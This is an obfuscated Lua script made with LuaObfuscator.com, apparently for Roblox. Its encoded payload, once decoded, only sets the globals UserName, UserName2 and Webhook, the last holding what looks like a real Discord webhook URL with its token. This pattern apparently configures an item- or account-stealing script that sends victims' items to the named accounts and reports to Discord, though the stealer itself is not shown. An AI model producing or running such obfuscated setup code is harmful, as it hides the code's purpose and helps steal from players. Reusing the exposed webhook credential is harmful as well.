--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.14) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v80=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -(1 -0))) -(v32-((1890 -(226 + 1044)) -(499 + 56 + 64)))) + (932 -(857 + 74)))) ;return v80-(v80%(569 -(367 + 201))) ;else local v81=0;local v82;while true do if (v81==(927 -(214 + 713))) then v82=((4 -3) + 1)^(v32-(1 + 0)) ;return (((v31%(v82 + v82))>=v82) and (878 -((399 -(32 + 85)) + 595))) or (1637 -(1523 + 112 + 2)) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (961 -(892 + 65)) ;return (v37 * (40022563 -23245347)) + (v36 * (120312 -54776)) + (v35 * (472 -216)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=1700 -(1419 + 281) ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38==(0 -0)) then v39=0;v40=nil;v38=1;end if (v38~=(76 -(71 + 3))) then else v43=nil;v44=nil;v38=3 + 0 ;end if (v38==3) then v45=nil;while true do local v87=0;local v88;while true do if (v87==(0 -0)) then v88=0;while true do if (0==v88) then local v100=0;while true do if (v100~=(1 -0)) then else v88=242 -(187 + 54) ;break;end if (0~=v100) then else if (v39==(782 -(162 + 618))) then local v112=0 + 0 ;local v113;while true do if (v112==0) then v113=0 + 0 ;while true do if ((0 -0)~=v113) then else local v116=0 -0 ;while true do if (v116==(1 + 0)) then v113=1;break;end if ((1636 -(1373 + 263))~=v116) then else for v124=1,v44 do local v125=0;local v126;local v127;local v128;local v129;while true do if (1~=v125) then else v128=nil;v129=nil;v125=1002 -(451 + 549) ;end if (v125==2) then while true do if (v126~=1) then else v129=nil;while true do if (v127~=1) then else if (v128==(1 + 0)) then v129=v22()~=0 ;elseif (v128==2) then v129=v25();elseif (v128==3) then v129=v26();end v45[v124]=v129;break;end if (0~=v127) then else local v134=0;while true do if (v134~=0) then else local v141=0 -0 ;while true do if (v141~=1) then else v134=1;break;end if (v141==0) then v128=v22();v129=nil;v141=1;end end end if (v134~=(1 -0)) then else v127=1;break;end end end end break;end if (v126~=(1384 -(746 + 638))) then else local v131=0 + 0 ;while true do if (v131==0) then v127=0;v128=nil;v131=1 -0 ;end if (v131~=(342 -(218 + 123))) then else v126=1582 -(1535 + 46) ;break;end end end end break;end if (v125~=0) then else v126=0;v127=nil;v125=1 + 0 ;end end end v43[3]=v22();v116=1;end end end if (v113==1) then for v117=1,v24() do local v118=0;local v119;local v120;local v121;local v122;while true do if (v118==(0 + 0)) then v119=0;v120=nil;v118=561 -(306 + 254) ;end if (v118==1) then v121=nil;v122=nil;v118=1 + 1 ;end if (2~=v118) then else while true do if (v119==(1 -0)) then v122=nil;while true do if (v120~=(1468 -(899 + 568))) then else while true do if (v121~=0) then else v122=v22();if (v21(v122,1 + 0 ,1)==(0 -0)) then local v135=603 -(268 + 335) ;local v136;local v137;local v138;local v139;local v140;while true do if (v135==(290 -(60 + 230))) then v136=572 -(426 + 146) ;v137=nil;v135=1;end if ((1 + 0)~=v135) then else v138=nil;v139=nil;v135=2;end if (v135==(1458 -(282 + 1174))) then v140=nil;while true do if ((813 -(569 + 242))~=v136) then else while true do if (v137~=(0 -0)) then else local v144=0;local v145;local v146;while true do if (v144==(0 + 0)) then v145=1024 -(706 + 318) ;v146=nil;v144=1;end if (v144~=(1252 -(721 + 530))) then else while true do if (v145~=0) then else v146=1271 -(945 + 326) ;while true do if (0~=v146) then else local v156=0 -0 ;while true do if (1==v156) then v146=1 + 0 ;break;end if (v156==(700 -(271 + 429))) then v138=v21(v122,2,3);v139=v21(v122,4 + 0 ,1506 -(1408 + 92) );v156=1;end end end if ((1087 -(461 + 625))==v146) then v137=1;break;end end break;end end break;end end end if (v137~=(1289 -(993 + 295))) then else local v147=0;local v148;local v149;while true do if (v147~=(1 + 0)) then else while true do if (v148==0) then v149=1171 -(418 + 753) ;while true do if (v149==(1 + 0)) then v137=1 + 1 ;break;end if (v149==(0 + 0)) then local v157=0 + 0 ;local v158;while true do if (v157~=0) then else v158=529 -(406 + 123) ;while true do if ((1770 -(1749 + 20))~=v158) then else v149=1;break;end if (v158==(0 + 0)) then v140={v23(),v23(),nil,nil};if (v138==0) then local v163=0 -0 ;local v164;local v165;while true do if (v163~=(0 -0)) then else v164=0;v165=nil;v163=1901 -(106 + 1794) ;end if (v163==(1 + 0)) then while true do if (v164==(0 + 0)) then v165=0 -0 ;while true do if (v165~=0) then else v140[7 -4 ]=v23();v140[4]=v23();break;end end break;end end break;end end elseif (v138==(115 -(4 + 110))) then v140[3]=v24();elseif (v138==(586 -(57 + 527))) then v140[1430 -(41 + 1386) ]=v24() -((105 -(17 + 86))^16) ;elseif (v138==3) then local v168=0 + 0 ;local v169;local v170;while true do if ((0 -0)~=v168) then else v169=0;v170=nil;v168=2 -1 ;end if (v168==(167 -(122 + 44))) then while true do if (v169~=0) then else v170=0;while true do if (v170~=(0 -0)) then else v140[9 -6 ]=v24() -(2^16) ;v140[4 + 0 ]=v23();break;end end break;end end break;end end end v158=1;end end break;end end end end break;end end break;end if (v147~=0) then else v148=0;v149=nil;v147=1 + 0 ;end end end if (v137==(5 -2)) then if (v21(v139,68 -(30 + 35) ,3)~=1) then else v140[4]=v45[v140[4]];end v40[v117]=v140;break;end if (v137~=2) then else local v151=0 + 0 ;local v152;while true do if (0==v151) then v152=0;while true do if (0~=v152) then else local v155=1257 -(1043 + 214) ;while true do if (v155==(0 -0)) then if (v21(v139,1,1213 -(323 + 889) )~=1) then else v140[5 -3 ]=v45[v140[2]];end if (v21(v139,582 -(361 + 219) ,322 -(53 + 267) )~=1) then else v140[1 + 2 ]=v45[v140[416 -(15 + 398) ]];end v155=983 -(18 + 964) ;end if (v155==(3 -2)) then v152=1;break;end end end if (v152==(1 + 0)) then v137=3;break;end end break;end end end end break;end if (v136==1) then local v142=0 + 0 ;while true do if (v142~=(850 -(20 + 830))) then else v139=nil;v140=nil;v142=1 + 0 ;end if (v142~=1) then else v136=2;break;end end end if (v136==0) then local v143=126 -(116 + 10) ;while true do if (0~=v143) then else v137=0;v138=nil;v143=1 + 0 ;end if (v143~=1) then else v136=1;break;end end end end break;end end end break;end end break;end if (v120~=(738 -(542 + 196))) then else local v132=0 -0 ;while true do if ((0 + 0)==v132) then v121=0 + 0 ;v122=nil;v132=1 + 0 ;end if (v132~=(2 -1)) then else v120=2 -1 ;break;end end end end break;end if (v119~=(1551 -(1126 + 425))) then else local v130=0;while true do if (v130~=(406 -(118 + 287))) then else v119=1;break;end if ((0 -0)~=v130) then else v120=1121 -(118 + 1003) ;v121=nil;v130=1;end end end end break;end end end v39=3;break;end end break;end end end if (v39==(0 -0)) then v40={};v41={};v42={};v39=1;end v100=378 -(142 + 235) ;end end end if (v88==(4 -3)) then if (v39==(1 + 0)) then local v109=0;while true do if (v109~=(977 -(553 + 424))) then else v43={v40,v41,nil,v42};v44=v24();v109=1;end if (v109==(1 + 0)) then v45={};v39=2 + 0 ;break;end end end if (v39==(6 -3)) then local v110=0;while true do if (v110~=0) then else for v114=2 -1 ,v24() do v41[v114-(2 -1) ]=v29();end return v43;end end end break;end end break;end end end break;end if (v38==(1 + 0)) then v41=nil;v42=nil;v38=9 -7 ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=v24();local v47=v24();local v48=754 -(239 + 514) ;local v49=(v21(v47,1,20) * (2^(12 + 20))) + v46 ;local v50=v21(v47,1350 -(797 + 227 + 305) ,23 + 8 );local v51=((v21(v47,11 + 21 )==(2 -1)) and  -(1203 -(274 + 99 + (2333 -(363 + 1141))))) or (732 -(476 + 255)) ;if (v50==(1130 -(369 + 761))) then if (v49==0) then return v51 * ((1580 -(1183 + 397)) + 0) ;else v50=1 -0 ;v48=0 -0 ;end elseif (v50==(2285 -(64 + 131 + 43))) then return ((v49==(0 + 0)) and (v51 * ((1 -0)/((1022 -686) -(144 + 192))))) or (v51 * NaN) ;end return v8(v51,v50-(1239 -((2017 -(1913 + 62)) + 174)) ) * (v48 + (v49/((2 + 0)^(44 + 8)))) ;end v26=nil;function v26(v52)local v53=0;local v54;local v55;while true do if (v53==(2 + 0)) then v55={};for v89=2 -1 , #v54 do v55[v89]=v2(v1(v3(v54,v89,v89)));end v53=1936 -(565 + 1368) ;end if (v53==((3 + 0) -2)) then v54=v3(v16,v19,(v19 + v52) -((2138 -(41 + 435)) -((2478 -(938 + 63)) + 184)) );v19=v19 + v52 ;v53=2 -0 ;end if (v53==(3 + 0)) then return v6(v55);end if (v53==(856 -(564 + 292))) then v54=nil;if  not v52 then local v95=0 -0 ;while true do if (v95==(0 -0)) then v52=v24();if (v52==(304 -(244 + 60))) then return "";end break;end end end v53=1;end end end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 2 + 0 );v19=v19 + (1127 -(936 + 189)) ;return (v58 * (85 + 171)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v59,16));if v20 then local v98=v5(v84,v20);v20=nil;return v98;else return v84;end break;end end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v66=v63;local v67=v64;local v68=v65;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v85=0,v74 do if (v85>=v68) then v72[v85-v68 ]=v73[v85 + 1 ];else v76[v85]=v73[v85 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v86=0;while true do if (v86==1) then if (v79<=2) then if (v79<=0) then do return;end elseif (v79>1) then v62[v78[3]]=v76[v78[2]];else v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v62[v78[3]]=v76[v78[2]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v70=v78[3];end elseif (v79<=3) then v70=v78[3];elseif (v79>4) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end else v76[v78[2]]=v78[3];end v70=v70 + 1 ;break;end if (v86==0) then v78=v66[v70];v79=v78[1];v86=1;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!083O00028O00026O00F03F03093O00557365724E616D653203093O006F757467616D65733403083O00557365724E616D65030B3O0050685F58644D692O74656E03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3133353435313330343237383336383239382F47374B5A714A45382O457A4B46596D30426941504D347A636970615A2D466C623047504C507130763765326937525F616E7839557539596639504D7A494D34545268345A000F3O0012043O00013O0026053O0006000100020004033O00060001001204000100043O001202000100033O0004033O000E00010026053O0001000100010004033O00010001001204000100063O001201000100053O00122O000100083O00122O000100073O00124O00023O00044O000100016O00017O00",v9(),...);
